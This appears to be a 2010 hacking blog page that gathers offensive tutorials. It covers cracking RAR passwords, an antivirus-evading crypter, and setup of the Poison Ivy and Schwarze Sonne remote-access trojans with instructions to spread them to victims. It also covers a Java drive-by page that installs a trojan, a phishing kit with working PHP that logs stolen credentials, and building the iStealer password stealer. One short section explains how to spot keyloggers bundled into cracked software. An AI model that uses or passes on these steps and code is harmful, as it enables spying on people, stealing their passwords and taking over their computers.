Pages

Thursday, October 28, 2010

Extract Files from Password Protected RAR Files


Winrar Unlock

WinrarUnlockExtractRARFilesWithoutPasswordFreeOpenLockedRARFiles Extract RAR Files Without Password Free – Open Locked RAR Files

Unlock locked winrar archive (including SFX) allowing you to modify the content freely. With Winrar archive lock to prevent modification, people cannot change the content/comment in it. Through some patching of few bytes, you are able to modify your archive with ease.

Download Winrar Unlock: Link

RAR Password Cracker

ExtractRARFilesWithoutPasswordFreeOpenLockedRARFiles Extract RAR Files Without Password Free – Open Locked RAR Files

This program is intended to recover lost passwords for RAR/WinRAR archives of versions 2.xx and 3.xx. The program finds by the method of exhaustive search all possible combinations of characters (“bruteforce” method), or using passwords from lists (“wordlist” or “dictionary” method). Self-extracting archives and multivolume archives are supported.

Download RAR Password Cracker: Link

The program is able to save a current state (you can interrupt the program at any time, and restart from the same state later).

Hack Keylogger Server File

A Tutorial to find keylogger server files:

Now a days in internet there are lots of software available and its a huge collection. Free softwares have no problem , u can download it from official site as its free. But The problem araises when you download a cracked verison of paid softwares. There are hackers who bind keyloggers with the paid softwares and they post in the blogs, warez sites, etc. By downloading and installing these softs, it will harm ur pc and also ur privacy is lost as its detects keystrokes and your passes are stolen.

So now the question arises, whether we can download cracked version of the paid softwares or is there any way to check that it is keylogged or binded.

The answer is Yes, You can test the software u downloaded is whether a keylogger binded or its clean by the following method.

Detecting of Keylogged binded softwares.

Tools needed:

  • A program like hex editing software to view the .exe file.The best one is the Bintext.

Here You can download the Bintext software.

http://new1371.solidwebhost.com/Wordpresscontent/hackkeyloggerfile/images/image001.jpg

Procedure:

Ø Take the software which you suspect to a separate place and open it with the Bintext.(here I downloaded a craked version of IDM which I suspect to be keylogged)

http://new1371.solidwebhost.com/Wordpresscontent/hackkeyloggerfile/images/image002.jpg

Ø Open the bintext software and browse the the file you suspect and click Go button.

http://new1371.solidwebhost.com/Wordpresscontent/hackkeyloggerfile/images/image003.jpg

Ø Usually keylogged servers have email and passes in it, so scroll down until you get the email address and passes.

http://new1371.solidwebhost.com/Wordpresscontent/hackkeyloggerfile/images/image005.jpg

Ø In the above screen shot , I have found the gmail user name(xxxhacker@gmail.com) and its pass.(thedevil) So what I suspected is right. This file is keylogged.

Ø So, by this simple method you can find the files whether it is keylogged or not

$[L] Crypter

$L Crypter
$L Crypter [ FUD ] . RUNTIME + SCANTIME . Only scan ur crypted file on http://scanner.novirusthanks.org/ By checking the Do not distribute option, to keep this crypter FUD. Never scan on virustotal or others.

Source : HF

Download Here

How To Hack Into Others Pc [ RAT ] [Poison ivy ]

Poison Ivy is a RAT, a remote administration tool. Which means that you use it to control your other computers.
Why you would want to use it:
You could setup your home computer to start/stop autobuying while being at work. And do all sorts of other things as well. Screenshots, webcam, keylogger, microphone recorder, it’s all there. Limited by the computers upload speed obviously though.
Setting a server of Poison Ivy consists of two parts: 1st is the “Set Up of No-IP”. 2nd is the customization of Poison Ivy
Things Required: 1) Poison Ivy. Download it from HERE
2)A bit of evil brain. :P

SETUP NO-IP Okay, so now you got simple download. Now you are going to need to sign up with No-IP at >>>no-ip.com<<<
(Notice that TESTURL does not have to exactly say that but whatever you use remember it for later) Now, install the No-IP Update Client. I would HIGHLY suggest making it run at start-up. Once it’s installed, run it and enter in your login details and you are done with the PRE part of the tutorial. SETUP OF RAT Now… We need to make a backdoor trojan better known as a Server. Install Poison Ivy and then go to File>New Server. Now… We get to setting the server up. Click “New Profile”. Type in “test” and hit OK. In this window there is one thing that is different for every person using this tutorial, the redirect. This is what I used so now you put what your redirect is. REMEMBER TO FOLLOW FORMAT!!! Format::8000:0, Mine:TESTURL.no-ip.biz:8000:0, If you don’t follow that EXCEPT format you will be not doing it right.
click 5 times, click 5 or more times.
There it is in the folder. DISTRIBUTE THIS .EXE TO YOUR VICTIM AND THEY HAVE TO RUN IT FOR IT TO WORK. Notice: Even if they run the trojan it may not work properly considering that alot of Anti-Virus’s catch it. Ok, so open Poison Ivy.. File>New Client. Make the port 8000 and then click OK. Now… Now.. Now..Now, you start pawning noobs who ran your trojan.
Information This shows OS info and server info Managers Files browse files and download/upload and excute Regedit mess with registry.. dont mess with this unless you know what your doing bro Processes same as with Crtl-Alt-Delete process tab Services Fuck it Devices the computers hardware.. you can disable/enable everything except mouse/keyboard Installed Applications Add/Remove Programs Windows the open windows, you can close them and send key strokes etc Tools Relay,Active Ports, Remote Shell dont mess with them unless you know what your doing Cached view passwords saves with MSN and internet explorer (you can save them by right click>save as) Surveillance Key Logger you can view the keys they pressed literally… duh Audio you can choose options to listen to them. this is fun to listen to thier music and ask about every song thier listening to Screen Takes a screenshot… start for ever x MS or single for just 1 screenie. ALSO, on the rite chose 100%, 24 bit for best or 25%,16 bit for worst Webcam I havent found one person that has a working one lol. but if u do just same as screen. A thanks is always appreciated in the comments.

How to Setup Schwarze Sonne RAT 0.9

Schwarze Sonne RAT 0.9

Setting a server of Sonne 0.9 Rat [Awesome RAT ] consists of two parts: 1st is the “Set Up of No-IP”. 2nd is the customization of Sonne 0.9 Rat
Things Required: 1) Sonne 0.9 Rat. Download it from HERE
2)A bit of concentration. :P

SETUP NO-IP Okay, so now you got simple download. Now you are going to need to sign up with No-IP at >>>no-ip.com<<<
Now Open Sonne 0.9 RAT program. It will Looks Like Below :
Click Build Server. The below Screen Will Show .
Clik Add profile Give the Name of profile wht ever u want : N clik ok.
then this below window will show.
After Loading Profile. The Below window Will show. Clik Connection.
Right Clik in the box of connection tab. clik add ip then put no-ip acc here. with port . See below.
Now goto installation tab Do the Settings as u wish . or see the below image .
Now go to build and clik build the server.
Now if u want to test the server then run the server file . and do the following steps.

Do as shown in image and thats it.
U have finished Everything . Now spread ur Server On the Internet After crypting and Do wht u want .The Features of this Awesome RAT is Given Below :
Thanks Friends For Reading . Plz do comments

How to Hack Through A Simple Webpage [Java Driveby]

Dropping a Trojan through a Webpage . [Java Driveby ]

Hi Friends, This Tutorial’s Source Is Cyberhackerz. It is easy before but i do some changes to make it more easy . it needs java installed to work properly.It is easy and used to drop ur trojan into victime pc just by visiting a webpage. Ya it is 100 times easy than spreading ur trojan on internet.Ok lets start. Do step By step

1.OK so first of all you need to download these files.

http://rapidshare.com/files/336439038/Java.zip.html

2.Now what we are going to do is simply go to

http://fileave.com/

and make an account.After this is complete you are going to upload your virus.

3.After this is complete copy your direct download link.

4.Now find those files you downloaded earlier in step 1 as it is now time to use them.Open Index2.html with Notepad.

5.Now it is time to edit this file.Now use that direct direct download link I told you to copy earlier.Now in the screenshot below I will be showing you where to replace these links.NOTE:There are two places to replace.

We are now done with that part!

6.Now go to http:// T 3 5 .COM (no spaces) and make your own account,it is free.Also when your done registering take note you have to check your email and confirm the account to be able to login.Now for the last step.

Upload all the files in that Java folder.There are five files in all.

Now if you setup up your site right it should look like this when you go to it.

Ya thats It . It will auto download the trojan into victim pc and auto execute it .

Thanks For reading friends :)

Make Your Own Phishing Page

Make Your Own Phishing Page

Hello Friends Tired Of Searching For Those Phishing Files How About Making Your Own Latest Fake Page Of Any Site In Just Few Steps Here Is The Tutorial 1. First Things First You Must Choose The Site Which You Wanna Make A Phisher From.

2. When You Found Your Site Right Click On It And Say “view source” And Save It On Desktop As index.html

3. Open The “index.html” With Notepad And Press CTRL+F And Type action. You Should Find A Command Looking Like This form action =” RANDOM URL” method=”post”

4.Change The Link After the Word action To write.php And Change The Word Post To get, Which Is Close To The Word method Remember Dont Erase The Inverted Commas And Commas It Might Affect The Page

5. Save index.html see the img given below After saving it.

6. Open a new file in Notepad <*?php
header(“Location: RANDOM URL”);
$handle = fopen(“passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

Remove The * Symbol From The Start Of The Code In The place of RANDOM URL write the URL wich u hav deleted in 3. Step Now copy the above code and paste it on notepad save as. write.php

7. Now open new file in Notepad and leave it blank and save as passwords.txt

8. Now upload 3 files(index.html, write.php & passwords.txt) on any free hosting site like 110mb.com or justfree.com remove

9. Test Out Your Website. Type In Something In Your Phisher And Then Go To Filemanager And Open The Password File, What You Wrote Should Be Typed Here!, ENJOY!!!!

Istealers

Stealing

[purple]What is iStealer 6.0?

iStealer 6.0 is the currently the latest free/public version (Credits to Gosu for cracking it)

of iStealer software, made by Kizar. iStealer is a password stealer, it only steals saved

passwords and only runs once. It is does not record keystrokes or run every X minutes

like a keylogger. iStealer 6.0 sends the saved passwords to your MySQL database, which

you can view using the PHP logger. I also recommend you export all logs from time to

time as the host may take down your site as you are not following the t+c.

Is iStealer 6.0 FUD (Fully Undetectable)

iStealer 6.0 is not FUD, therefore if you want 100% of users who run it to get infected, you will have to crypt it. Almost every crypter will crypt iStealer without corrupting it. I recommend using a runtime and scantime crypter.

Step 1

Firstly, you will need to download iStealer 6.0. You can download iStealer 6.0 from the link below

” http://rapidshare.com/files/363227348/iStealer.rar “

Note : No istealer is totally clean . u need to turn disable ur antivirus if u want to run it >

Step.2

Register on Solidwebhost.com .

step.3

open ur solidwebhost account.

click on Mysql.

Make a new database der.

make a username of database der.

After Creating Username and Database.

clik on assign privileges.

Now u can see this.

Step 4

Open the downloaded file of istealer

der will be a folder of php…

open index.php with notepad.

fill the details u have in website.here

upload these two files on the Justfree.

Step 5

Open up iStealer.exe

Replace yourusername with your username.J ustfree.com/index.php.

that’s it

clik build and spread ur file on the net and get many passes a day.

When Someone open that builded file u will get all his websites Passes.